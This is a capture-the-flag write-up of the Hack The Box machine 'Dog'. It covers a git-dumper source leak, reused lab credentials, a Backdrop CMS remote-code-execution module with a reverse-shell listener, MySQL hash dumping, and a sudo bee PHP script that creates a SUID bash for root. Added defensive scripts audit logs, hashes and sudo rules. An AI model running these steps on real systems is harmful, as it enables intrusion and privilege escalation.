Dog - HTB Machine
Dog is a Hack The Box machine released on 08 Mar 2025.
Summary (How?)
Started by identifying the CMS version and other services running on the target, including Backdrop CMS 1.27.1. Through endpoint enumeration and exploration of accessible files and directories, I discovered several open directories, among them .git, which can be downloaded using git-dumper to retrieve the source code of the application.
In the source code I found credentials for the database and some usernames. There was a lot of password reuse: I managed to access the admin panel using a combination of them. Once there, I leveraged an exploit (CVE-2022-43422) to achieve remote code execution (RCE). From there, I established a web shell, which had a trick since it was getting deleted after a minute, so I modified the payload to get a reverse shell as the www-data user.
Further enumeration revealed database information and user account hashes, which I attempted to crack but with limited success. Eventually, I used the discovered credentials to switch to the johncusack user and accessed the user flag (more password reuse).
Finally, to escalate privileges to root, I identified that the johncusack user had permissions to execute the bee command with sudo. By crafting a malicious PHP payload and executing it via bee, I was able to create a SUID binary and gain root access, ultimately retrieving the root flag.
Enumeration
We’re given the following page:
- CMS: Backdrop 1.27.1 (a fork from Drupal)
- Apache Web Server 2.4.41
- PHP
Kind of a token in the source code of the main page:
<script>window.Backdrop = {settings: {"basePath":"\/","pathPrefix":"","drupalCompatibility":true,"ajaxPageState":{"theme":"basis","theme_token":"J0MdrAec4ZUc9cm6CKHZO_aZjKPbewDlze-iLmARzq0","css":{"core\/misc\/ [...]
Endpoints
- /?q=user/login
- /?q=user/password
- /?q=about
- /?q=posts/dog-xxx (e.g. http://dog.htb/?q=posts/dog-obesity)
Open files folders
/files
/core
robots.txt
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /core/
Disallow: /profiles/
# Files
Disallow: /README.md
Disallow: /web.config
# Paths (clean URLs)
Disallow: /admin
Disallow: /comment/reply
Disallow: /filter/tips
Disallow: /node/add
Disallow: /search
Disallow: /user/register
Disallow: /user/password
Disallow: /user/login
Disallow: /user/logout
# Paths (no clean URLs)
Disallow: /?q=admin
Disallow: /?q=comment/reply
Disallow: /?q=filter/tips
Disallow: /?q=node/add
Disallow: /?q=search
Disallow: /?q=user/password
Disallow: /?q=user/register
Disallow: /?q=user/login
Disallow: /?q=user/logout
CMS Version
In several files the version 1.27.1 is mentioned:
http://dog.htb/core/profiles/testing/testing.info
http://dog.htb/core/profiles/standard/standard.info
http://dog.htb/core/modules/admin_bar/admin_bar.info
; Added by Backdrop CMS packaging script on 2024-03-07
project = backdrop
version = 1.27.1
timestamp = 1709862662
Users
From posts in the page we identify
- dogBackDropSystem
Retrieving the source code
At this point I was a bit overwhelmed… I had found a lot but nothing interesting to get a foothold: no credentials, nothing. As there was too much information to process, I decided to run an automated vulnerability scanner; based on my experience I used Nessus. The scan was a breakthrough, as it showed something I had missed: an exposed .git repository
/.git
The next step is to use git-dumper to download and reconstruct the repo.
┌──(kali㉿kali)-[~/htb-machines/dog/dog-repo]
└─$ python3 -m venv dog && source dog/bin/activate
┌──(dog)─(kali㉿kali)-[~/htb-machines/dog/dog-repo]
└─$ pip3 install git-dumper
┌──(dog)─(kali㉿kali)-[~/htb-machines/dog/dog-repo]
└─$ git-dumper http://dog.htb/.git ./dog-repo
[...]
[-] Fetching http://dog.htb/.git/objects/fb/119e5ba91dd5141e07aad5229754cd06401c99 [200]
[-] Fetching http://dog.htb/.git/objects/fb/e216729827cf70ee9a7f5230abfc1d6b1fbde6 [200]
[-] Fetching http://dog.htb/.git/objects/fb/19f504e2b822fccae54999cee48a19fc874deb [200]
[-] Fetching http://dog.htb/.git/objects/fb/cb6f3d288a7e9fa5649f5f18b36777f69e799c [200]
[-] Sanitizing .git/config
[-] Running git checkout .
Updated 2873 paths from the index
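Because an exposed .git directory and the version-revealing .info files are what opened this box, here is an added example (not part of the original writeup) of the check a defender would run over the web server's access log. It parses Apache combined-format lines, flags every successful request under /.git/ and every successful fetch of a .info file, and reports an address that pulls several loose objects from /.git/objects/ as a dump in progress. The log lines are constructed for the example (the object ids are the ones git-dumper printed above; addresses and timestamps are invented), and the threshold of three object fetches is an assumption.

```python
import re
from collections import defaultdict

# Constructed Apache combined-log lines (not taken from the box). The object ids are the
# ones git-dumper printed; the client addresses and timestamps are invented.
SAMPLE_LOG = """\
10.10.14.118 - - [10/Jun/2025:07:29:01 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "python-requests/2.32.3"
10.10.14.118 - - [10/Jun/2025:07:29:01 +0000] "GET /.git/config HTTP/1.1" 200 92 "-" "python-requests/2.32.3"
10.10.14.118 - - [10/Jun/2025:07:29:02 +0000] "GET /.git/objects/fb/119e5ba91dd5141e07aad5229754cd06401c99 HTTP/1.1" 200 412 "-" "python-requests/2.32.3"
10.10.14.118 - - [10/Jun/2025:07:29:02 +0000] "GET /.git/objects/fb/e216729827cf70ee9a7f5230abfc1d6b1fbde6 HTTP/1.1" 200 388 "-" "python-requests/2.32.3"
10.10.14.118 - - [10/Jun/2025:07:29:03 +0000] "GET /.git/objects/fb/19f504e2b822fccae54999cee48a19fc874deb HTTP/1.1" 200 501 "-" "python-requests/2.32.3"
10.10.14.118 - - [10/Jun/2025:07:29:03 +0000] "GET /.git/objects/fb/cb6f3d288a7e9fa5649f5f18b36777f69e799c HTTP/1.1" 200 277 "-" "python-requests/2.32.3"
10.10.14.50 - - [10/Jun/2025:07:30:10 +0000] "GET /?q=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.50 - - [10/Jun/2025:07:30:12 +0000] "GET /.git/HEAD HTTP/1.1" 404 196 "-" "Mozilla/5.0"
10.10.14.50 - - [10/Jun/2025:07:30:40 +0000] "GET /core/profiles/standard/standard.info HTTP/1.1" 200 112 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# A ".git" path component anywhere in the URL path (the repo may live under a sub-site).
GIT_PATH_RE = re.compile(r'(?:^|/)\.git(?:/|$)')


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def analyse(log_text, dump_threshold=3):
    """Return (kind, ip, detail) findings for .git exposure and version disclosure.

    kinds: git-leak          a request under /.git/ was answered with 200
           git-dump          one client fetched >= dump_threshold loose objects
           version-disclosure a .info file (carries the CMS version) was served
    """
    findings = []
    object_fetches = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # ignore the query string
        if GIT_PATH_RE.search(path):
            if rec["status"] == 200:
                findings.append(("git-leak", rec["ip"], path))
            if "/.git/objects/" in path:
                object_fetches[rec["ip"]] += 1
        elif path.endswith(".info") and rec["status"] == 200:
            findings.append(("version-disclosure", rec["ip"], path))
    for ip, n in object_fetches.items():
        if n >= dump_threshold:
            findings.append(("git-dump", ip, f"{n} object fetches"))
    return findings


if __name__ == "__main__":
    for kind, ip, detail in analyse(SAMPLE_LOG):
        print(f"{kind:<19} {ip:<14} {detail}")
```

Run it over a real log with analyse(open(path).read()). A 404 for /.git/HEAD (the second client above) is just a probe and is not reported as a leak; a 200 means the metadata is world-readable, and the remediation is to keep .git out of the document root or deny it in Apache 2.4 with a <DirectoryMatch "/\.git"> block containing Require all denied. Entries in robots.txt like the ones above are advisory and are not an access control.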
And finally
┌──(dog)─(kali㉿kali)-[~/htb-machines/dog/dog-repo]
└─$ ls -la
total 92
drwxrwxr-x 8 kali kali 4096 Jun 10 07:29 .
drwxrwxr-x 6 kali kali 4096 Jun 10 07:28 ..
drwxrwxr-x 9 kali kali 4096 Jun 10 07:29 core
drwxrwxr-x 7 kali kali 4096 Jun 10 07:29 files
drwxrwxr-x 7 kali kali 4096 Jun 10 07:29 .git
-rwxrwxr-x 1 kali kali 578 Jun 10 07:29 index.php
drwxrwxr-x 2 kali kali 4096 Jun 10 07:29 layouts
-rwxrwxr-x 1 kali kali 18092 Jun 10 07:29 LICENSE.txt
-rwxrwxr-x 1 kali kali 5285 Jun 10 07:29 README.md
-rwxrwxr-x 1 kali kali 1198 Jun 10 07:29 robots.txt
-rwxrwxr-x 1 kali kali 21732 Jun 10 07:29 settings.php
drwxrwxr-x 2 kali kali 4096 Jun 10 07:29 sites
drwxrwxr-x 2 kali kali 4096 Jun 10 07:29 themes
Database credentials in settings.php
$database = 'mysql://root:[email protected]/backdrop';
And there’s a user
┌──(dog)─(kali㉿kali)-[~/htb-machines/dog/dog-repo]
└─$ grep -r dog.htb
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json: "[email protected]"
.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <[email protected]> 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <[email protected]> 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
Accessing the Admin Panel
This gives us access to the admin panel using the credentials for the database found before.
Some admin users
RCE with www-data user
Googling the CMS version we find that it is vulnerable to RCE
https://www.exploit-db.com/exploits/52021
└─$ python3 exploitdb-52021.py http://dog.htb
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://dog.htb/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://dog.htb/modules/shell/shell.php
This generates a shell folder, which we have to package using tar -cvf shell.tar shell/ and then install it as a module. Finally upload and install it, which gives us a webshell.
It lasts around a minute or two and then gets deleted.
Let’s try being quick with a reverse shell. Here I followed the steps as shown before, added the file rshell.php and then made a request to /shell/rshell.php. We are IN!
┌──(kali㉿kali)-[~/htb-machines/dog/rshell]
└─$ nc -lvnp 8000
listening on [any] 8000 ...
connect to [10.10.14.118] from (UNKNOWN) [10.10.11.58] 53208
Linux dog 5.4.0-208-generic #228-Ubuntu SMP Fri Feb 7 19:41:33 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
18:31:34 up 5:16, 1 user, load average: 0.00, 0.15, 0.13
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
johncusa pts/1 10.10.14.216 18:23 6.00s 0.08s 0.08s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Accessing the database
Once inside the machine we enumerate other services
www-data@dog:/var/www/html$ netstat -atnlp
netstat -atnlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
Let’s connect to the database as we know root’s password from the source code.
www-data@dog:/var/www/html$ mysql -h localhost -u root -p backdrop
mysql -h localhost -u root -p backdrop
Enter password: BackDropJ2024DS2024
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1129
Server version: 8.0.41-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2025, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
There we have the hashes
mysql> select name,pass,mail from users;
select name,pass,mail from users;
+-------------------+---------------------------------------------------------+----------------------------+
| name | pass | mail |
+-------------------+---------------------------------------------------------+----------------------------+
| | | |
| jPAdminB | $S$E7dig1GTaGJnzgAXAtOoPuaTjJ05fo8fH9USc6vO87T./ffdEr/. | [email protected] |
| jobert | $S$E/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1 | [email protected] |
| dogBackDropSystem | $S$EfD1gJoRtn8I5TlqPTuTfHRBFQWL3x6vC5D3Ew9iU4RECrNuPPdD | [email protected] |
| john | $S$EYniSfxXt8z3gJ7pfhP5iIncFfCKz8EIkjUD66n/OTdQBFklAji. | [email protected] |
| morris | $S$E8OFpwBUqy/xCmMXMqFp3vyz1dJBifxgwNRMKktogL7VVk7yuulS | [email protected] |
| axel | $S$E/DHqfjBWPDLnkOP5auHhHDxF4U.sAJWiODjaumzxQYME6jeo9qV | [email protected] |
| rosa | $S$EsV26QVPbF.s0UndNPeNCxYEP/0z2O.2eLUNdKW/xYhg2.lsEcDT | [email protected] |
| tiffany | $S$EEAGFzd8HSQ/IzwpqI79aJgRvqZnH4JSKLv2C83wUphw0nuoTY8v | [email protected] |
+-------------------+---------------------------------------------------------+----------------------------+
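The $S$ prefix on these hashes is the phpass-style scheme shared by Drupal 7 and Backdrop (hashcat mode 7900 in the attempt further down): the fourth character encodes the iteration count as a power of two and the next eight characters are the salt. Added example, not from the writeup: a small audit that parses the mysql client's table output, decodes each hash's cost and salt, and flags rows that fall below a chosen minimum cost, use an unsalted legacy format, or share a salt. The table is constructed: the first three hashes are copied from the output above with placeholder e-mail addresses, and the last two rows (a hash at Drupal 7's lower default cost and a bare MD5) are invented to show the findings. The minimum of 2^16 rounds is an assumption matching the E these hashes carry.

```python
import re

# Alphabet Drupal/Backdrop use to encode the cost character and the digest.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MIN_LOG2_ROUNDS = 16  # assumption: treat anything below 2^16 rounds as weak

# Invented row: Drupal 7's default cost character 'D' (2^15), dummy salt and digest.
LEGACY_HASH = "$S$D" + "AAAAAAAA" + "z" * 43

# Constructed excerpt in the shape of the mysql client's table output.
# First three hashes are from the dump above (placeholder e-mails); the last two are invented.
USERS_TABLE = """\
+-------------------+---------------------------------------------------------+----------------------+
| name              | pass                                                    | mail                 |
+-------------------+---------------------------------------------------------+----------------------+
|                   |                                                         |                      |
| jPAdminB          | $S$E7dig1GTaGJnzgAXAtOoPuaTjJ05fo8fH9USc6vO87T./ffdEr/. | jpadminb@example.com |
| jobert            | $S$E/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1 | jobert@example.com   |
| dogBackDropSystem | $S$EfD1gJoRtn8I5TlqPTuTfHRBFQWL3x6vC5D3Ew9iU4RECrNuPPdD | system@example.com   |
| legacyuser        | {legacy} | legacy@example.com   |
| olduser           | 5f4dcc3b5aa765d61d8327deb882cf99                        | old@example.com      |
+-------------------+---------------------------------------------------------+----------------------+
""".format(legacy=LEGACY_HASH)


def parse_mysql_table(text):
    """Turn the mysql client's ASCII table into a list of dicts keyed by column name."""
    rows = [line for line in text.splitlines() if line.startswith("|")]

    def cells(line):
        return [c.strip() for c in line.strip().strip("|").split("|")]

    header = cells(rows[0])
    return [dict(zip(header, cells(r))) for r in rows[1:]]


def inspect_hash(h):
    """Decode a Drupal 7 / Backdrop $S$ hash: cost character at index 3, salt at 4..11."""
    if re.fullmatch(r"[0-9a-f]{32}", h):
        return {"scheme": "md5", "log2_rounds": 0, "rounds": 1, "salt": ""}
    if not h.startswith("$S$") or len(h) != 55 or h[3] not in ITOA64:
        return {"scheme": "unknown", "log2_rounds": 0, "rounds": 0, "salt": ""}
    log2 = ITOA64.index(h[3])
    return {"scheme": "drupal7-sha512", "log2_rounds": log2,
            "rounds": 2 ** log2, "salt": h[4:12]}


def audit_users(table_text, min_log2=MIN_LOG2_ROUNDS):
    """Return (name, issue) findings for every account whose stored hash is below policy."""
    findings = []
    seen_salts = {}
    for row in parse_mysql_table(table_text):
        name, h = row["name"], row["pass"]
        if name == "" and h == "":
            continue  # the anonymous (uid 0) row has no password by design
        info = inspect_hash(h)
        if info["scheme"] == "md5":
            findings.append((name, "unsalted-md5"))
        elif info["scheme"] == "unknown":
            findings.append((name, "unrecognised-hash"))
        elif info["log2_rounds"] < min_log2:
            findings.append((name, f"weak-rounds:{info['rounds']}"))
        if info["salt"]:
            if info["salt"] in seen_salts:
                findings.append((name, f"salt-reused-with:{seen_salts[info['salt']]}"))
            else:
                seen_salts[info["salt"]] = name
    return findings


if __name__ == "__main__":
    for name, issue in audit_users(USERS_TABLE):
        print(f"{name:<18} {issue}")
```

Salts cannot tell you whether two accounts share a password, which is why the reuse on this box only surfaced by trying the database password against user accounts; what the audit can tell you is whether the stored hashes are at the expected cost and format before an attacker with database access gets to test them offline.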
User flag
There are two users: johncusack and jobert. The user flag is in johncusack’s home directory.
ls /home
jobert johncusack
www-data@dog:/var/www/html$ ls -la /home/johncusack
ls -la /home/johncusack
total 36
drwxr-xr-x 5 johncusack johncusack 4096 Jun 10 18:30 .
drwxr-xr-x 4 root root 4096 Aug 15 2024 ..
lrwxrwxrwx 1 root root 9 Feb 7 15:59 .bash_history -> /dev/null
[...]
-rw-r----- 1 root johncusack 33 Jun 10 13:18 user.txt
After doing a lot of useless things, like trying to crack the extracted hashes using hashcat:
Session..........: hashcat
Status...........: Quit
Hash.Mode........: 7900 (Drupal7)
Hash.Target......: hash
Time.Started.....: Tue Jun 10 17:04:22 2025 (4 secs)
Time.Estimated...: Tue Jun 10 17:16:34 2025 (12 mins, 8 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 39377 H/s (66.50ms) @ Accel:8 Loops:512 Thr:512 Vec:1
Recovered........: 0/2 (0.00%) Digests (total), 0/2 (0.00%) Digests (new), 0/2 (0.00%) Salts
Progress.........: 0/28688768 (0.00%)
Rejected.........: 0/0 (0.00%)
Restore.Point....: 0/14344384 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:33280-33792
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> sackville
Hardware.Mon.#1..: Temp: 64c Fan: 66% Util:100% Core:1755MHz Mem:9751MHz Bus:8
Nothing worked, not even some kernel exploits to escalate directly from www-data. Finally, I had to use tiffany’s password to log in as johncusack… I hate password reuse, and even more when it is not the first thing I try.
www-data@dog:/$ su johncusack
su johncusack
Password: BackDropJ2024DS2024
johncusack@dog:/$ cd && cat user.txt
895745b485c4f3bd7c23c
Root flag
Enumeration inside the box
We have the following privileges as johncusack
sudo -l
[sudo] password for johncusack: BackDropJ2024DS2024
Matching Defaults entries for johncusack on dog:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User johncusack may run the following commands on dog:
(ALL : ALL) /usr/local/bin/bee
This is useless but interesting
Bee functionality
According to the documentation: bee
is a command line utility for Backdrop CMS. It includes commands that allow developers to interact with Backdrop sites, performing actions like:
- Running cron
- Clearing caches
- Downloading and installing Backdrop
- Downloading, enabling and disabling projects
- Viewing information about a site and/or available projects
After executing it, we can see the possible use cases, and there are some interesting ones in the advanced section…
ADVANCED
- db-query (dbq): Execute a query using db_query().
- eval (ev, php-eval): Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.
- php-script (scr): Execute an arbitrary PHP file after bootstrapping Backdrop.
- sql (sqlc, sql-cli, db-cli): Open an SQL command-line interface using Backdrop's database credentials.
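The sudo rule above grants johncusack /usr/local/bin/bee as any user, and bee's eval and php-script subcommands run arbitrary PHP after bootstrapping the site, so the rule is equivalent to handing out a root shell. Added example, not from the writeup: a small audit that parses `sudo -l` output and flags rules granting root execution of a command on a deny-list of code-execution-equivalent tools, plus NOPASSWD root rules for review. The `sudo -l` text is constructed (the bee line mirrors the box, the other two rules are invented for contrast), and the deny-list is an assumption that an administrator would maintain.

```python
import re

# Constructed `sudo -l` output: the bee rule mirrors the box, the other two are invented.
SUDO_L_OUTPUT = r"""Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
    (www-data) /usr/bin/php /var/www/html/cron.php
"""

# Commands that give their caller an arbitrary-code-execution primitive when run as root.
# Assumption: an admin-maintained list; bee is on it because of its eval / php-script commands.
CODE_EXEC_COMMANDS = {"bee", "php"}

# "(runas_user : runas_group) TAG: /path/to/cmd args"
RULE_RE = re.compile(
    r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$'
)


def parse_sudo_rules(text):
    """Extract the command rules that follow the 'User X may run ...' line of sudo -l."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas_user = m.group("runas").split(":")[0].strip()
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        rules.append({
            "runas": runas_user,
            "nopasswd": "NOPASSWD" in tags,
            "cmd": m.group("cmd"),
            "args": m.group("args").strip(),
        })
    return rules


def audit_rules(rules, deny_list=CODE_EXEC_COMMANDS):
    """Return (command, severity, reason) for rules that amount to root code execution."""
    findings = []
    for r in rules:
        basename = r["cmd"].rsplit("/", 1)[-1]
        as_root = r["runas"] in ("ALL", "root")
        if as_root and basename in deny_list:
            # No argument restriction at all means every subcommand (eval, php-script...) is allowed.
            severity = "critical" if r["args"] == "" else "high"
            findings.append((r["cmd"], severity, f"root code-execution primitive via {basename}"))
        elif as_root and r["nopasswd"]:
            findings.append((r["cmd"], "info", "NOPASSWD as root"))
    return findings


if __name__ == "__main__":
    for cmd, severity, reason in audit_rules(parse_sudo_rules(SUDO_L_OUTPUT)):
        print(f"{severity:<9} {cmd:<28} {reason}")
```

On a fleet, feed it the output of sudo -l -U <user> for each account. The fix for a bee-style finding is not to grant the tool as root at all: run the Backdrop maintenance jobs that need bee under the site's own account (the one that owns the files), so that eval and php-script can do nothing that account could not already do.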
Let’s try by crafting a php-script that writes a SUID shell to /tmp
PHP script that writes a SUID bash shell
<?php
// Copy bash to /tmp and set the SUID bit on that copy; run as root through sudo bee,
// the copy ends up owned by root. Both calls must name the same path.
copy('/bin/bash', '/tmp/bash');
chmod('/tmp/bash', 04755);
And then execute it using bee
johncusack@dog:/var/www/html$ sudo /usr/local/bin/bee php-script /home/johncusack/script.php
IMPORTANT: for this to work we must be placed inside /var/www/html (or the root directory of your Backdrop CMS site) because the bee command looks for the site files relative to our current working directory. If it doesn’t find them, it can’t bootstrap the CMS and gives the error:
johncusack@dog:~$ sudo /usr/local/bin/bee php-script script.php
✘ The required bootstrap level for 'php-script' is not ready.
Anything in /tmp…?
YES SIR
johncusack@dog:/var/www/html$ ls -l /tmp
total 1188
-rwsr-xr-x 1 root root 1183448 Jun 20 17:48 bash
And there we go, simply lovely with the SUID bit
johncusack@dog:/var/www/html$ /tmp/bash -p
bash-5.0# id
uid=1001(johncusack) gid=1001(johncusack) euid=0(root) groups=1001(johncusack)
bash-5.0# cat /root/root.txt
481f29e96b6fdbf464